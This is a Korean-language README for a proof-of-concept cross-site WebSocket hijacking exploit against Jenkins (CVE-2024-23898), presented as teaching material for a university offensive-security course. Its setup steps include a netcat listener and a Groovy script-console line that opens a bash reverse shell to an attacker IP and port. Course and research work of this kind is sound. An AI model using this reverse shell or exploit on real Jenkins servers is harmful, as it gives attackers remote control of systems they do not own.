
CVE-2024-23898에 대한 개념 증명 크로스사이트 WebSocket 하이재킹 익스플로잇 — Jenkins 버전 2.217-2.441에 영향을 미치는 취약점. 카네기 멜론 대학교의 Hacking & Offensive Security 과정에서 교육용으로 사용됩니다.
CVE-2024-23898에 대한 개념 증명 교차 사이트 WebSocket 하이재킹 익스플로잇입니다. 이는 Jenkins 버전 2.217-2.441에 영향을 미치는 취약점입니다.
이 익스플로잇은 Jenkins CLI를 대상으로 하며, 이를 통해 원격으로 Jenkins 제어 서버에 접근하고 명령을 실행할 수 있습니다. 이 익스플로잇을 통해 원격 공격자는 관리자가 대상 Jenkins 제어 서버에 로그인한 상태에서 악성 사이트를 방문하도록 속임을 당할 경우, Jenkins 제어 서버에 대한 접근 권한을 획득하고 지속적인 백도어를 설정할 수 있습니다.
이 코드는 교육 목적으로만 제공되며, Carnegie Mellon University의 해킹 및 오펜시브 보안 과정에서만 사용하기 위한 것입니다. 이 코드는 무기화되거나 악성 코드 제작에 사용되어서는 안 됩니다. 저자는 그러한 시도를 명시적으로 반대합니다.
nc -l <port_num> 명령어로 netcat 리스너를 시작하세요(<port_num>을 사용하지 않는 포트 번호로 바꾸세요).ipconfig getifaddr en0 명령어로 찾을 수 있습니다.[http://localhost:8080/script](http://localhost:8080/script)로 이동하세요. 아직 로그인하지 않았다면 관리자 계정으로 로그인하세요.['bash', '-c', 'bash -i >& /dev/tcp/<attacker_ip>/<port_num> 0>&1'].execute()